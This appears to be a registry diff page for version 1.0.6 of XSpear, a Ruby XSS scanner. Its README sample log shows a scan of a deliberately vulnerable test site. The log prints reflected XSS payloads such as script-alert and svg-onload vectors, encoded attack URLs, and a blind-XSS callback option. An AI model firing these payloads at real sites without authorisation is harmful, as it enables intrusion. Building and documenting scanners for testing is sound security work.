XSpear 1.0.5 → 1.0.6

Sign up to get free protection for your applications and to get access to all the features.
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: b09dcb74e1734799658762e143a9faf16db70df6200de80ca2334cdbfc8c5d08
4
- data.tar.gz: dd840605d1fd1261b672f5bf27de9f648a924abeb685f6bea2334a4f2f3f3cc1
3
+ metadata.gz: 79c560a49f42b36d468188a502f3b8c16f78b2b0c8a11af550deeb083978529e
4
+ data.tar.gz: d64291c47fddcee3d326ad2cb1db999c52fd992e3baf954b1b6fcdd47137f773
5
5
  SHA512:
6
- metadata.gz: c29c155ff0ab0667c2ff4deab4618eaace8dae3410e159b141187f1cd13040679b6f84597ff250fe3e99ee740e8676dbaeccc7df405f6ccf19026441f9a928cb
7
- data.tar.gz: 568f793d58fa31180fa494aefa54557b2e927ee3c240a5fb789502bd1c43730c24f22849eb2ac6110daccb97a882f845a69b1aea723848b3561eb46a9e03d7af
6
+ metadata.gz: 3af5242c09f427957569d96ab94f239f774471594d127e4f33ca3c92db2ef1787cf59adbad739c18944340635dbe6f3b5cb10261d2d9e144379505e5356a85b5
7
+ data.tar.gz: 4b2d8e9715b15fe2637d20655837e084d59dafbda2472ecc31a135dd8d3ee3469742c8d81cd8c372c323038d5ec07d70dafca7fb3bf2f5da4b1e758513e13256
@@ -0,0 +1,12 @@
1
+ # These are supported funding model platforms
2
+
3
+ github: #hahwul
4
+ patreon: # Replace with a single Patreon username
5
+ open_collective: # Replace with a single Open Collective username
6
+ ko_fi: # Replace with a single Ko-fi username
7
+ tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
8
+ community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
9
+ liberapay: # Replace with a single Liberapay username
10
+ issuehunt: # Replace with a single IssueHunt username
11
+ otechie: # Replace with a single Otechie username
12
+ custom: ['https://www.paypal.me/hahwul']
data/.idea/workspace.xml CHANGED
@@ -3,10 +3,7 @@
3
3
  <component name="ChangeListManager">
4
4
  <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
5
5
  <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
6
- <change beforePath="$PROJECT_DIR$/exe/XSpear" beforeDir="false" afterPath="$PROJECT_DIR$/exe/XSpear" afterDir="false" />
7
6
  <change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
8
- <change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
9
- <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
10
7
  </list>
11
8
  <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
12
9
  <option name="SHOW_DIALOG" value="false" />
@@ -22,7 +19,7 @@
22
19
  <file pinned="false" current-in-tab="false">
23
20
  <entry file="file://$PROJECT_DIR$/exe/XSpear">
24
21
  <provider selected="true" editor-type-id="text-editor">
25
- <state relative-caret-position="496">
22
+ <state relative-caret-position="525">
26
23
  <caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
27
24
  </state>
28
25
  </provider>
@@ -32,19 +29,19 @@
32
29
  <entry file="file://$PROJECT_DIR$/README.md">
33
30
  <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
34
31
  <state split_layout="SPLIT">
35
- <first_editor relative-caret-position="45">
36
- <caret line="3" column="132" selection-start-line="3" selection-start-column="132" selection-end-line="3" selection-end-column="132" />
32
+ <first_editor relative-caret-position="599">
33
+ <caret line="268" column="110" selection-start-line="268" selection-start-column="110" selection-end-line="268" selection-end-column="110" />
37
34
  </first_editor>
38
35
  <second_editor />
39
36
  </state>
40
37
  </provider>
41
38
  </entry>
42
39
  </file>
43
- <file pinned="false" current-in-tab="false">
40
+ <file pinned="false" current-in-tab="true">
44
41
  <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
45
42
  <provider selected="true" editor-type-id="text-editor">
46
- <state relative-caret-position="528">
47
- <caret line="309" column="94" lean-forward="true" selection-start-line="309" selection-start-column="94" selection-end-line="309" selection-end-column="94" />
43
+ <state relative-caret-position="370">
44
+ <caret line="376" lean-forward="true" selection-start-line="376" selection-end-line="376" />
48
45
  </state>
49
46
  </provider>
50
47
  </entry>
@@ -52,8 +49,8 @@
52
49
  <file pinned="false" current-in-tab="false">
53
50
  <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
54
51
  <provider selected="true" editor-type-id="text-editor">
55
- <state relative-caret-position="586">
56
- <caret line="107" column="36" lean-forward="true" selection-start-line="107" selection-start-column="36" selection-end-line="107" selection-end-column="36" />
52
+ <state relative-caret-position="392">
53
+ <caret line="102" column="9" lean-forward="true" selection-start-line="102" selection-start-column="9" selection-end-line="102" selection-end-column="9" />
57
54
  </state>
58
55
  </provider>
59
56
  </entry>
@@ -71,12 +68,12 @@
71
68
  <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
72
69
  <provider selected="true" editor-type-id="text-editor">
73
70
  <state relative-caret-position="195">
74
- <caret line="13" column="19" lean-forward="true" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
71
+ <caret line="13" column="19" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
75
72
  </state>
76
73
  </provider>
77
74
  </entry>
78
75
  </file>
79
- <file pinned="false" current-in-tab="true">
76
+ <file pinned="false" current-in-tab="false">
80
77
  <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
81
78
  <provider selected="true" editor-type-id="text-editor">
82
79
  <state relative-caret-position="15">
@@ -114,12 +111,12 @@
114
111
  <list>
115
112
  <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
116
113
  <option value="$PROJECT_DIR$/XSpear.gemspec" />
117
- <option value="$PROJECT_DIR$/README.md" />
118
114
  <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
119
115
  <option value="$PROJECT_DIR$/exe/XSpear" />
116
+ <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
117
+ <option value="$PROJECT_DIR$/README.md" />
120
118
  <option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
121
119
  <option value="$PROJECT_DIR$/lib/XSpear.rb" />
122
- <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
123
120
  </list>
124
121
  </option>
125
122
  </component>
@@ -137,6 +134,7 @@
137
134
  <foldersAlwaysOnTop value="true" />
138
135
  </navigator>
139
136
  <panes>
137
+ <pane id="Scope" />
140
138
  <pane id="ProjectPane">
141
139
  <subPane>
142
140
  <expand>
@@ -174,7 +172,6 @@
174
172
  <select />
175
173
  </subPane>
176
174
  </pane>
177
- <pane id="Scope" />
178
175
  </panes>
179
176
  </component>
180
177
  <component name="PropertiesComponent">
@@ -233,7 +230,8 @@
233
230
  <updated>1562942814778</updated>
234
231
  <workItem from="1562942816004" duration="15337000" />
235
232
  <workItem from="1563638656518" duration="4985000" />
236
- <workItem from="1563809961097" duration="3592000" />
233
+ <workItem from="1563809961097" duration="4237000" />
234
+ <workItem from="1563893538891" duration="2230000" />
237
235
  </task>
238
236
  <task id="LOCAL-00001" summary="init update">
239
237
  <created>1562945899597</created>
@@ -424,17 +422,73 @@
424
422
  <option name="project" value="LOCAL" />
425
423
  <updated>1563649975625</updated>
426
424
  </task>
427
- <option name="localTasksCounter" value="28" />
425
+ <task id="LOCAL-00028" summary="(1.0.5) Add blind XSS options &amp; edit &quot;filtered Rule testing code&quot;">
426
+ <created>1563813695850</created>
427
+ <option name="number" value="00028" />
428
+ <option name="presentableId" value="LOCAL-00028" />
429
+ <option name="project" value="LOCAL" />
430
+ <updated>1563813695850</updated>
431
+ </task>
432
+ <task id="LOCAL-00029" summary="(1.0.5) Update README.md">
433
+ <created>1563814201784</created>
434
+ <option name="number" value="00029" />
435
+ <option name="presentableId" value="LOCAL-00029" />
436
+ <option name="project" value="LOCAL" />
437
+ <updated>1563814201784</updated>
438
+ </task>
439
+ <task id="LOCAL-00030" summary="(1.0.6)[fixed #6] Edit Static Analysis code">
440
+ <created>1563893769120</created>
441
+ <option name="number" value="00030" />
442
+ <option name="presentableId" value="LOCAL-00030" />
443
+ <option name="project" value="LOCAL" />
444
+ <updated>1563893769120</updated>
445
+ </task>
446
+ <task id="LOCAL-00031" summary="(1.0.6)[fixed #7] CallbackNotAdded 쪽 분기문 수정">
447
+ <created>1563893901111</created>
448
+ <option name="number" value="00031" />
449
+ <option name="presentableId" value="LOCAL-00031" />
450
+ <option name="project" value="LOCAL" />
451
+ <updated>1563893901111</updated>
452
+ </task>
453
+ <task id="LOCAL-00032" summary="(1.0.6)[fixed #4] Report 객체 수정">
454
+ <created>1563894048747</created>
455
+ <option name="number" value="00032" />
456
+ <option name="presentableId" value="LOCAL-00032" />
457
+ <option name="project" value="LOCAL" />
458
+ <updated>1563894048747</updated>
459
+ </task>
460
+ <task id="LOCAL-00033" summary="(1.0.6)[fixed #8] Added response header analysis module">
461
+ <created>1563894186608</created>
462
+ <option name="number" value="00033" />
463
+ <option name="presentableId" value="LOCAL-00033" />
464
+ <option name="project" value="LOCAL" />
465
+ <updated>1563894186608</updated>
466
+ </task>
467
+ <task id="LOCAL-00034" summary="(1.0.6)[fixed #9] Added method in report-cli">
468
+ <created>1563894430592</created>
469
+ <option name="number" value="00034" />
470
+ <option name="presentableId" value="LOCAL-00034" />
471
+ <option name="project" value="LOCAL" />
472
+ <updated>1563894430592</updated>
473
+ </task>
474
+ <task id="LOCAL-00035" summary="(1.0.6) Edit report &amp; scanning format">
475
+ <created>1563895638242</created>
476
+ <option name="number" value="00035" />
477
+ <option name="presentableId" value="LOCAL-00035" />
478
+ <option name="project" value="LOCAL" />
479
+ <updated>1563895638242</updated>
480
+ </task>
481
+ <option name="localTasksCounter" value="36" />
428
482
  <servers />
429
483
  </component>
430
484
  <component name="TimeTrackingManager">
431
- <option name="totallyTimeSpent" value="23914000" />
485
+ <option name="totallyTimeSpent" value="26789000" />
432
486
  </component>
433
487
  <component name="ToolWindowManager">
434
- <frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
488
+ <frame x="-1920" y="-620" width="1920" height="1057" extended-state="0" />
435
489
  <editor active="true" />
436
490
  <layout>
437
- <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.16240682" />
491
+ <window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.16400427" />
438
492
  <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
439
493
  <window_info id="Favorites" order="2" side_tool="true" />
440
494
  <window_info anchor="bottom" id="Message" order="0" />
@@ -477,7 +531,15 @@
477
531
  <MESSAGE value="Edit version , release 1.0.2" />
478
532
  <MESSAGE value="Add EventHandler Test logic (1.0.3), edit description on report" />
479
533
  <MESSAGE value="verbose가 1일 떄 배너 출력되지 않도록 수정" />
480
- <option name="LAST_COMMIT_MESSAGE" value="verbose가 1 배너 출력되지 않도록 수정" />
534
+ <MESSAGE value="(1.0.5) Add blind XSS options &amp; edit &quot;filtered Rule testing code&quot;" />
535
+ <MESSAGE value="(1.0.5) Update README.md" />
536
+ <MESSAGE value="(1.0.6)[fixed #6] Edit Static Analysis code" />
537
+ <MESSAGE value="(1.0.6)[fixed #7] CallbackNotAdded 쪽 분기문 수정" />
538
+ <MESSAGE value="(1.0.6)[fixed #4] Report 객체 수정" />
539
+ <MESSAGE value="(1.0.6)[fixed #8] Added response header analysis module" />
540
+ <MESSAGE value="(1.0.6)[fixed #9] Added method in report-cli" />
541
+ <MESSAGE value="(1.0.6) Edit report &amp; scanning format" />
542
+ <option name="LAST_COMMIT_MESSAGE" value="(1.0.6) Edit report &amp; scanning format" />
481
543
  </component>
482
544
  <component name="editorHistoryManager">
483
545
  <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -493,13 +555,10 @@
493
555
  <entry file="file://$PROJECT_DIR$/bin/setup">
494
556
  <provider selected="true" editor-type-id="text-editor" />
495
557
  </entry>
496
- <entry file="file://$PROJECT_DIR$/README.md">
497
- <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
498
- <state split_layout="SPLIT">
499
- <first_editor relative-caret-position="45">
500
- <caret line="3" column="132" selection-start-line="3" selection-start-column="132" selection-end-line="3" selection-end-column="132" />
501
- </first_editor>
502
- <second_editor />
558
+ <entry file="file://$PROJECT_DIR$/exe/XSpear">
559
+ <provider selected="true" editor-type-id="text-editor">
560
+ <state relative-caret-position="525">
561
+ <caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
503
562
  </state>
504
563
  </provider>
505
564
  </entry>
@@ -510,51 +569,54 @@
510
569
  </state>
511
570
  </provider>
512
571
  </entry>
513
- <entry file="file://$PROJECT_DIR$/Rakefile">
514
- <provider selected="true" editor-type-id="text-editor" />
515
- </entry>
516
- <entry file="file:///usr/local/bin/rake">
517
- <provider selected="true" editor-type-id="text-editor" />
518
- </entry>
519
- <entry file="file://$PROJECT_DIR$/exe/XSpear">
572
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
520
573
  <provider selected="true" editor-type-id="text-editor">
521
- <state relative-caret-position="496">
522
- <caret line="35" column="117" selection-start-line="35" selection-start-column="117" selection-end-line="35" selection-end-column="117" />
574
+ <state relative-caret-position="195">
575
+ <caret line="13" column="19" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
523
576
  </state>
524
577
  </provider>
525
578
  </entry>
526
- <entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
579
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
527
580
  <provider selected="true" editor-type-id="text-editor">
528
- <state relative-caret-position="195">
529
- <caret line="13" column="19" lean-forward="true" selection-start-line="13" selection-start-column="19" selection-end-line="13" selection-end-column="19" />
581
+ <state relative-caret-position="15">
582
+ <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
530
583
  </state>
531
584
  </provider>
532
585
  </entry>
533
- <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
586
+ <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
534
587
  <provider selected="true" editor-type-id="text-editor">
535
- <state relative-caret-position="586">
536
- <caret line="107" column="36" lean-forward="true" selection-start-line="107" selection-start-column="36" selection-end-line="107" selection-end-column="36" />
588
+ <state relative-caret-position="105">
589
+ <caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
537
590
  </state>
538
591
  </provider>
539
592
  </entry>
540
- <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
541
- <provider selected="true" editor-type-id="text-editor">
542
- <state relative-caret-position="528">
543
- <caret line="309" column="94" lean-forward="true" selection-start-line="309" selection-start-column="94" selection-end-line="309" selection-end-column="94" />
593
+ <entry file="file://$PROJECT_DIR$/Rakefile">
594
+ <provider selected="true" editor-type-id="text-editor" />
595
+ </entry>
596
+ <entry file="file:///usr/local/bin/rake">
597
+ <provider selected="true" editor-type-id="text-editor" />
598
+ </entry>
599
+ <entry file="file://$PROJECT_DIR$/README.md">
600
+ <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
601
+ <state split_layout="SPLIT">
602
+ <first_editor relative-caret-position="599">
603
+ <caret line="268" column="110" selection-start-line="268" selection-start-column="110" selection-end-line="268" selection-end-column="110" />
604
+ </first_editor>
605
+ <second_editor />
544
606
  </state>
545
607
  </provider>
546
608
  </entry>
547
- <entry file="file://$PROJECT_DIR$/XSpear.gemspec">
609
+ <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
548
610
  <provider selected="true" editor-type-id="text-editor">
549
- <state relative-caret-position="105">
550
- <caret line="7" column="23" selection-start-line="7" selection-start-column="23" selection-end-line="7" selection-end-column="38" />
611
+ <state relative-caret-position="392">
612
+ <caret line="102" column="9" lean-forward="true" selection-start-line="102" selection-start-column="9" selection-end-line="102" selection-end-column="9" />
551
613
  </state>
552
614
  </provider>
553
615
  </entry>
554
- <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
616
+ <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
555
617
  <provider selected="true" editor-type-id="text-editor">
556
- <state relative-caret-position="15">
557
- <caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
618
+ <state relative-caret-position="370">
619
+ <caret line="376" lean-forward="true" selection-start-line="376" selection-end-line="376" />
558
620
  </state>
559
621
  </provider>
560
622
  </entry>
data/README.md CHANGED
@@ -6,12 +6,16 @@ XSpear is XSS Scanner on ruby gems
6
6
  ## Key features
7
7
  - Pattern matching based XSS scanning
8
8
  - Detect `alert` `confirm` `prompt` event on headless browser (with Selenium)
9
- - Testing request/response for XSS protection bypass and reflected params
9
+ - Testing request/response for XSS protection bypass and reflected params<br>
10
+ + Reflected Params
11
+ + Filtered test `event handler` `HTML tag` `Special Char`
12
+ - Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
10
13
  - XSpear running on ruby code(with Gem library)
11
14
  - Dynamic/Static Analysis(Find SQL Error, etc..)
12
15
  - Show table base report and testing raw query(url)
13
16
  - Testing at selected parameters
14
17
  - Support output format `cli` `json`
18
+ + cli: summary, filtered rule(params), Raw Query
15
19
  - Support Verbose level (quit / nomal / raw data)
16
20
  - Support custom callback code to any test various attack vectors
17
21
 
@@ -58,6 +62,9 @@ $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'
58
62
  --headers=HEADERS [optional] Add HTTP Headers
59
63
  --cookie=COOKIE [optional] Add Cookie
60
64
  -p, --param=PARAM [optional] Test paramters
65
+ -b, --BLIND=URL [optional] Add vector of Blind XSS
66
+ + with XSS Hunter, ezXSS, HBXSS, etc...
67
+ + e.g : -b https://hahwul.xss.ht
61
68
  -t, --threads=NUMBER [optional] thread , default: 10
62
69
  -o, --output=FILENAME [optional] Save JSON Result
63
70
  -v, --verbose=1~3 [optional] Show log depth
@@ -102,65 +109,70 @@ etc...
102
109
  ### Sample log
103
110
  **Scanning XSS**
104
111
  ```
105
- $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=1"
106
- ) (
107
- ( /( )\ )
108
- )\())(()/( ( ) (
109
- ((_)\ /(_))` ) ))\ ( /( )(
110
- __((_)(_)) /(/( /((_))(_))(()\
111
- \ \/ // __|((_)_\ (_)) ((_)_ ((_)
112
- > < \__ \| '_ \)/ -_)/ _` || '_|
113
- /_/\_\|___/| .__/ \___|\__,_||_| />
114
- |_| \ /<
115
- {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
116
- / \<
117
- \>
118
- [*] creating a test query.
119
- [*] test query generation is complete. [30 query]
120
- [*] starting test and analysis. [10 threads]
121
- [-] [01:24:38] not reflected XsPeaR`
122
- [-] [01:24:38] not reflected XsPeaR>
123
- [I] [01:24:38] reflected rEfe6[param: cat][reflected parameter]
124
- [-] [01:24:38] not reflected XsPeaR|
125
- [-] [01:24:38] not reflected XsPeaR'
126
- [I] [01:24:38] [param: cat][Found SQL Error Pattern]
127
- [-] [01:24:38] not reflected XsPeaR(
128
- [-] [01:24:38] not reflected <XsPeaR
129
- [-] [01:24:38] not reflected XsPeaR"
130
- [-] [01:24:38] not reflected XsPeaR;
131
- [-] [01:24:39] not reflected XsPeaR:
132
- [-] [01:24:39] not reflected XsPeaR[
133
- [-] [01:24:39] not reflected XsPeaR]
134
- [-] [01:24:39] not reflected XsPeaR}
135
- [-] [01:24:39] not reflected XsPeaR)
136
- [-] [01:24:39] not reflected XsPeaR{
137
- [-] [01:24:39] not reflected XsPeaR.
138
- [-] [01:24:39] not reflected XsPeaR-
139
- [-] [01:24:39] not reflected XsPeaR+
140
- [-] [01:24:39] not reflected XsPeaR,
141
- [I] [01:24:40] reflected XsPeaR$[param: cat][not filtered $]
142
- [-] [01:24:40] not reflected <svg/onload=alert(45)>
143
- [H] [01:24:40] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
144
- [-] [01:24:40] not reflected XsPeaR=
145
- [-] [01:24:40] not reflected <img/src onerror=alert(45)>
146
- [*] finish scan. the report is being generated..
147
- +----+------+------------------+-------+----------------------------+-------------------------+
148
- | [ XSpear report ] |
149
- | http://testphp.vulnweb.com/listproducts.php?cat=1 |
150
- | 2019-07-20 01:24:38 +0900 ~ 2019-07-20 01:25:41 +0900 Found 4 issues. |
151
- +----+------+------------------+-------+----------------------------+-------------------------+
152
- | NO | TYPE | ISSUE | PARAM | PAYLOAD | DESCRIPTION |
153
- +----+------+------------------+-------+----------------------------+-------------------------+
154
- | 0 | INFO | REFLECTED | cat | rEfe6 | reflected parameter |
155
- | 1 | INFO | DYNAMIC ANALYSIS | cat | XsPeaR" | Found SQL Error Pattern |
156
- | 2 | INFO | FILERD RULE | cat | XsPeaR$ | not filtered $ |
157
- | 3 | HIGH | XSS | cat | <script>alert(45)</script> | reflected XSS Code |
158
- +----+------+------------------+-------+----------------------------+-------------------------+
159
- < Raw Query >
160
- [0] http://testphp.vulnweb.com/listproducts.php?cat=1?cat=1rEfe6
161
- [1] http://testphp.vulnweb.com/listproducts.php?cat=1?cat=1XsPeaR%22
162
- [2] http://testphp.vulnweb.com/listproducts.php?cat=1?cat=1XsPeaR%24
163
- [3] http://testphp.vulnweb.com/listproducts.php?cat=1?cat=1%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
112
+ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z"
113
+ ) (
114
+ ( /( )\ )
115
+ )\())(()/( ( ) (
116
+ ((_)\ /(_))` ) ))\ ( /( )(
117
+ __((_)(_)) /(/( /((_))(_))(()\
118
+ \ \/ // __|((_)_\ (_)) ((_)_ ((_)
119
+ > < \__ \| '_ \)/ -_)/ _` || '_|
120
+ /_/\_\|___/| .__/ \___|\__,_||_| />
121
+ |_| \ /<
122
+ {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
123
+ / \<
124
+ \> [ v1.0.5 ]
125
+ [*] creating a test query.
126
+ [*] test query generation is complete. [138 query]
127
+ [*] starting test and analysis. [10 threads]
128
+ [I] [01:44:06] [param: cat][Found SQL Error Pattern]
129
+ [I] [01:44:06] reflected rEfe6[param: cat][reflected parameter]
130
+ [I] [01:44:08] reflected onhwul=64[param: cat][not filtered event handler on{any} pattern]
131
+ [-] [01:44:14] not reflected <svg/onload=alert(45)>
132
+ [H] [01:44:14] reflected <script>alert(45)</script>[param: cat][reflected XSS Code]
133
+ [H] [01:44:15] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code]
134
+ [-] [01:44:15] not reflected <img/src onerror=alert(45)>
135
+ [-] [01:44:20] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
136
+ =>
137
+ [-] [01:44:21] not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
138
+ =>
139
+ [V] [01:44:21] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>
140
+ => [param: cat][triggered <script>alert(45)</script>]
141
+ [-] [01:44:22] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
142
+ =>
143
+ [V] [01:44:22] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>
144
+ => [param: cat][triggered <svg/onload=alert(45)>]
145
+ [-] [01:44:23] not found alert/prompt/confirm event '"><svg/onload=alert(45)>
146
+ =>
147
+ [*] finish scan. the report is being generated..
148
+ +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
149
+ | [ XSpear report ] |
150
+ | http://testphp.vulnweb.com/listproducts.php?cat=z |
151
+ | 2019-07-23 01:44:05 +0900 ~ 2019-07-23 01:44:23 +0900 Found 7 issues. |
152
+ +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
153
+ | NO | TYPE | ISSUE | PARAM | PAYLOAD | DESCRIPTION |
154
+ +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
155
+ | 0 | INFO | DYNAMIC ANALYSIS | cat | XsPeaR" | Found SQL Error Pattern |
156
+ | 1 | INFO | REFLECTED | cat | rEfe6 | reflected parameter |
157
+ | 2 | INFO | FILERD RULE | cat | onhwul=64 | not filtered event handler on{any} pattern |
158
+ | 3 | HIGH | XSS | cat | <script>alert(45)</script> | reflected XSS Code |
159
+ | 4 | HIGH | XSS | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code |
160
+ | 5 | VULN | XSS | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> |
161
+ | 6 | VULN | XSS | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> |
162
+ +----+------+------------------+-------+-------------------------------------+--------------------------------------------+
163
+ < Not Filtered >
164
+ [cat] param
165
+ + Special Char: `,\,<,|,(,;,>,',),+,-,{,.,],,,[,},:,=,$
166
+ + Event Handler: "onAfterUpdate","onAbort","onBeforeCut","onAfterPrint","onBeforeActivate","onActivate","onBeforeCopy","onBeforeUpdate","onBeforeEditFocus","onBeforeDeactivate","onBlur","onBounce","onCellChange","onBegin","onBeforePrint","onBeforeUnload","onBeforePaste","onCut","onContextMenu","onCopy","onDataSetComplete","onClick","onDblClick","onControlSelect","onDataSetChanged","onChange","onDataAvailable","onDragEnd","onDragOver","onDrag","onDragLeave","onDragStart","onDeactivate","onDragEnter","onDragDrop","onDrop","onEnd","onFinish","onHashChange","onFocusIn","onErrorUpdate","onHelp","onFocusOut","onInput","onFocus","onError","onFilterChange","onMouseDown","onKeyPress","onMediaComplete","onLayoutComplete","onMediaError","onKeyUp","onMessage","onKeyDown","onLoad","onLoseCapture","onMouseEnter","onMouseUp","onMouseLeave","onMove","onMoveEnd","onMoveStart","onMouseOver","onMouseMove","onMouseOut","onMouseWheel","onProgress","onOutOfSync","onPopState","onPropertyChange","onOffline","onOnline","onRedo","onPaste","onReadyStateChange","onPause","onResizeStart","onRowExit","onResume","onRowDelete","onRepeat","onReset","onResizeEnd","onReverse","onRowsEnter","onResize","onSelectionChange","onSyncRestored","onStart","onStop","onStorage","onRowInserted","onSelect","onSelectStart","onScroll","onSeek","onTrackChange","onUnload","onURLFlip","onSubmit","onTimeError","onUndo"
167
+ + HTML Tag: "script","iframe"
168
+ < Raw Query >
169
+ [0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22
170
+ [1] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6
171
+ [2] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E
172
+ [3] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
173
+ [4] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E
174
+ [5] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E
175
+ [6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3E
164
176
  ```
165
177
 
166
178
  **to JSON**
@@ -173,8 +185,8 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
173
185
  ```ruby
174
186
  require 'XSPear'
175
187
 
176
- s = XspearScan.new "https://www.hahwul.com?target_url", "post_body=thisisbodydata", "CustomHeader: wow", 3, 10, "result.json", "3"
177
- # s = XspearScan.new options.url, options.data, options.headers, options.level, options.thread.to_i, options.output, options.verbose
188
+ s = XspearScan.new "https://www.hahwul.com?target_url", "post_body=thisisbodydata", "CustomHeader: wow", 3, 10, "result.json", "3", "blind-xss-url"
189
+ # s = XspearScan.new options.url, options.data, options.headers, options.level, options.thread.to_i, options.output, options.verbose, options.blind
178
190
  s.run
179
191
  ```
180
192
 
@@ -254,5 +266,5 @@ The gem is available as open source under the terms of the [MIT License](https:/
254
266
  Everyone interacting in the XSpear project’s codebases, issue trackers, chat rooms and mailing lists is expected to follow the [code of conduct](https://github.com/[USERNAME]/XSpear/blob/master/CODE_OF_CONDUCT.md).
255
267
 
256
268
  ## ScreenShot
257
- <img src="https://user-images.githubusercontent.com/13212227/61582619-ed233700-ab67-11e9-94f7-33cb6af5997c.png" width=100%>
269
+ <img src="https://user-images.githubusercontent.com/13212227/61649243-14a30c80-acec-11e9-9a20-73839c4ec580.png" width=100%>
258
270
  <img src="https://user-images.githubusercontent.com/13212227/61311071-8b459300-a830-11e9-8e60-c08e984fdacb.png" width=100%>
@@ -13,13 +13,14 @@ class IssueStruct
13
13
  end
14
14
 
15
15
  class XspearRepoter
16
- def initialize(url,starttime)
16
+ def initialize(url,starttime, method)
17
17
  @url = url
18
18
  @starttime = starttime
19
19
  @endtime = nil
20
20
  @issue = []
21
21
  @query = []
22
22
  @filtered_objects = {}
23
+ @method = method
23
24
  # type : i,v,l,m,h
24
25
  # param : paramter
25
26
  # type :
@@ -33,14 +34,14 @@ class XspearRepoter
33
34
  def add_issue_first(type, issue, param, payload, pattern, description)
34
35
  rtype = {"i"=>"INFO","v"=>"VULN","l"=>"LOW","m"=>"MIDUM","h"=>"HIGH"}
35
36
